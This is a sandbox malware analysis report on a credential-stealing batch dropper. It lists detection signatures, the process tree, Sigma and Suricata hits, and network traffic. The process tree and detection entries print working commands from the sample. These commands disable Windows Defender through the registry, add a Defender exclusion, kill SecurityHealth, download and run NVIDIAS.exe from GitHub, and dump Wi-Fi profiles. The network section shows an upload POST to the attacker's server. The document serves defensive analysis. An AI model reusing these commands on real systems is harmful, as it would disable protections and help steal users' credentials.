Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3gJQoqWpxb.bat

Overview

General Information

Sample name:3gJQoqWpxb.bat
Analysis ID:1576243
MD5:3642e29400aac4137d7da517c1a0161b
SHA1:b538bfc1dc9903ff5766000219cd91f3cf978299
SHA256:d5033dd57b3a239c426396ffd361a81ad4e37848cb05ff5ac47f3e73555a0a56
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
PE file contains section with special chars
Powershell drops PE file
Queries memory information (via WMI often done to detect virtual machines)
Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64native
  • cmd.exe (PID: 8788 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\3gJQoqWpxb.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cacls.exe (PID: 8996 cmdline: "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system" MD5: A353590E06C976809F14906746109758)
    • powershell.exe (PID: 8980 cmdline: powershell -window hidden -command "" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • reg.exe (PID: 6076 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 5364 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableOnAccessProtection" /t REG_DWORD /d 1 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 2208 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 2512 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v "DisableAntiSpyware" /t REG_DWORD /d 1 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 2288 cmdline: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "SecurityHealth" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • takeown.exe (PID: 2280 cmdline: takeown /f "C:\Windows\System32\SecurityHealthService.exe" MD5: D258A76AA885CBBCAE8C720CD1C284A5)
    • icacls.exe (PID: 1936 cmdline: icacls "C:\Windows\System32\SecurityHealthService.exe" /grant:r "computer\user":F /c MD5: 48C87E3B3003A2413D6399EA77707F5D)
    • takeown.exe (PID: 812 cmdline: takeown /f "C:\Windows\System32\SecurityHealthSystray.exe" MD5: D258A76AA885CBBCAE8C720CD1C284A5)
    • icacls.exe (PID: 1856 cmdline: icacls "C:\Windows\System32\SecurityHealthSystray.exe" /grant:r "computer\user":F /c MD5: 48C87E3B3003A2413D6399EA77707F5D)
    • taskkill.exe (PID: 1568 cmdline: taskkill /IM SecurityHealthSystray.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • powershell.exe (PID: 2100 cmdline: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ MD5: 04029E121A0CFA5991749937DD22A1D9)
      • WmiPrvSE.exe (PID: 9000 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • timeout.exe (PID: 9056 cmdline: timeout.exe /t 10 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • attrib.exe (PID: 1564 cmdline: attrib +h "QQQ" /s /d MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • powershell.exe (PID: 712 cmdline: powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • NVIDIAS.exe (PID: 716 cmdline: NVIDIAS.exe MD5: 2FE8C93D75210E538AEC9062BA29C645)
      • cmd.exe (PID: 5036 cmdline: "cmd.exe" /c tasklist MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • tasklist.exe (PID: 6480 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • cmd.exe (PID: 6904 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • WerFault.exe (PID: 7784 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 716 -ip 716 MD5: 40A149513D721F096DDF50C04DA2F01F)
        • chcp.com (PID: 8976 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)
        • netsh.exe (PID: 2836 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • findstr.exe (PID: 7444 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6072 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • chcp.com (PID: 5548 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)
        • taskkill.exe (PID: 2448 cmdline: TaskKill /F /IM 716 MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • timeout.exe (PID: 7360 cmdline: Timeout /T 2 /Nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • WerFault.exe (PID: 1300 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 716 -s 3320 MD5: 40A149513D721F096DDF50C04DA2F01F)
    • attrib.exe (PID: 6520 cmdline: attrib +h "C:\ProgramData\QQQ\NVIDIAS.exe" /s /d MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • svchost.exe (PID: 8800 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: F586835082F632DC8D9404D83BC16316)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
3gJQoqWpxb.batINDICATOR_SUSPICIOUS_EXE_UACBypass_fodhelperdetects Windows exceutables potentially bypassing UAC using fodhelper.exeditekSHen
  • 0x149:$s1: \SOFTWARE\Classes\ms-settings\shell\open\command
  • 0x233:$s1: \software\classes\ms-settings\shell\open\command
  • 0x268:$s2: DelegateExecute
  • 0x28c:$s3: fodhelper
  • 0x1f2:$s4: ConsentPromptBehaviorAdmin
SourceRuleDescriptionAuthorStrings
Process Memory Space: NVIDIAS.exe PID: 716JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ, CommandLine: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\3gJQoqWpxb.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8788, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ, ProcessId: 2100, ProcessName: powershell.exe
    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 712, TargetFilename: C:\ProgramData\QQQ\NVIDIAS.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'", CommandLine: powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\3gJQoqWpxb.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8788, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'", ProcessId: 712, ProcessName: powershell.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ, CommandLine: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\3gJQoqWpxb.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8788, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ, ProcessId: 2100, ProcessName: powershell.exe
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'", CommandLine: powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\3gJQoqWpxb.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8788, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'", ProcessId: 712, ProcessName: powershell.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -window hidden -command "", CommandLine: powershell -window hidden -command "", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\3gJQoqWpxb.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8788, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -window hidden -command "", ProcessId: 8980, ProcessName: powershell.exe
    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 908, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8800, ProcessName: svchost.exe

    Stealing of Sensitive Information

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: NVIDIAS.exe, ParentImage: C:\ProgramData\QQQ\NVIDIAS.exe, ParentProcessId: 716, ParentProcessName: NVIDIAS.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 6904, ProcessName: cmd.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-16T17:30:28.130597+010028438561A Network Trojan was detected192.168.11.204971089.23.100.2331490TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: C:\ProgramData\QQQ\NVIDIAS.exeAvira: detection malicious, Label: HEUR/AGEN.1309950
    Source: C:\ProgramData\QQQ\NVIDIAS.exeReversingLabs: Detection: 70%
    Source: C:\ProgramData\QQQ\NVIDIAS.exeJoe Sandbox ML: detected
    Source: unknownHTTPS traffic detected: 140.82.113.4:443 -> 192.168.11.20:49707 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.11.20:49708 version: TLS 1.2
    Source: Binary string: ntkrnlmp.pdbxC4 source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Xml.ni.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: WINLOA~1.PDBwinload_prod.pdbtmpx87^ source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.ni.pdbRSDS source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Windows.Forms.ni.pdb source: NVIDIAS.exe, 00000015.00000002.1225165858.0000000070E1B000.00000020.00000001.01000000.00000008.sdmp, WER6A29.tmp.dmp.39.dr
    Source: Binary string: WINLOA~1.PDBwinload_prod.pdbndows PowerShell.lnk source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Drawing.ni.pdb source: NVIDIAS.exe, 00000015.00000002.1234568805.0000000070FFB000.00000020.00000001.01000000.00000007.sdmp, WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Configuration.ni.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Net.Http.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Security.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: ntkrnlmp.pdbmb;~f source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.IO.Compression.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Configuration.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Drawing.ni.pdbRSDS source: NVIDIAS.exe, 00000015.00000002.1234568805.0000000070FFB000.00000020.00000001.01000000.00000007.sdmp, WER6A29.tmp.dmp.39.dr
    Source: Binary string: winload_prod.pdb source: NVIDIAS.exe, 00000015.00000002.1218454425.00000000069E9000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: System.Xml.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Xml.ni.pdbRSDS# source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Core.ni.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Windows.Forms.pdb source: NVIDIAS.exe, 00000015.00000002.1225165858.0000000070E1B000.00000020.00000001.01000000.00000008.sdmp, WER6A29.tmp.dmp.39.dr
    Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdata source: NVIDIAS.exe, 00000015.00000002.1220147777.00000000079AA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Drawing.pdb/ source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: mscorlib.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991\tdataac4 source: NVIDIAS.exe, 00000015.00000002.1220147777.00000000079AA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: NVIDIAS.exe, 00000015.00000002.1225165858.0000000070E1B000.00000020.00000001.01000000.00000008.sdmp, WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Net.Http.ni.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Drawing.pdb source: NVIDIAS.exe, 00000015.00000002.1234568805.0000000070FFB000.00000020.00000001.01000000.00000007.sdmp, WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Management.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\tdatata source: NVIDIAS.exe, 00000015.00000002.1216769501.0000000005D04000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*ws\* source: NVIDIAS.exe, 00000015.00000002.1220147777.00000000079AA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.ni.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Net.Http.pdbH source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Core.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\** source: NVIDIAS.exe, 00000015.00000002.1216769501.0000000005D04000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Security.pdb24 source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: mscorlib.ni.pdbRSDS] source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdata*a source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\*ae source: NVIDIAS.exe, 00000015.00000002.1220147777.00000000079AA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: mscorlib.pdbH source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.ni.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Core.ni.pdbRSDS source: WER6A29.tmp.dmp.39.dr

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.11.20:49710 -> 89.23.100.233:1490
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 1490
    Source: unknownNetwork traffic detected: HTTP traffic on port 1490 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 1490 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 1490 -> 49710
    Source: global trafficTCP traffic: 192.168.11.20:49710 -> 89.23.100.233:1490
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: POST /upload HTTP/1.1Content-Type: multipart/form-data; boundary="8329d0ed-a884-470e-bcd9-c4075adde960"Host: 89.23.100.233:1490Content-Length: 119581Expect: 100-continueConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 140.82.113.4 140.82.113.4
    Source: Joe Sandbox ViewIP Address: 89.23.100.233 89.23.100.233
    Source: Joe Sandbox ViewIP Address: 104.16.184.241 104.16.184.241
    Source: Joe Sandbox ViewASN Name: MAXITEL-ASRU MAXITEL-ASRU
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: unknownDNS query: name: icanhazip.com
    Source: global trafficHTTP traffic detected: GET /pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /pr0niums/Repo/refs/heads/main/NVIDIAS.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: raw.githubusercontent.comConnection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: global trafficHTTP traffic detected: GET /pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /pr0niums/Repo/refs/heads/main/NVIDIAS.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: raw.githubusercontent.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: github.com
    Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
    Source: global trafficDNS traffic detected: DNS query: icanhazip.com
    Source: global trafficDNS traffic detected: DNS query: 247.106.0.0.in-addr.arpa
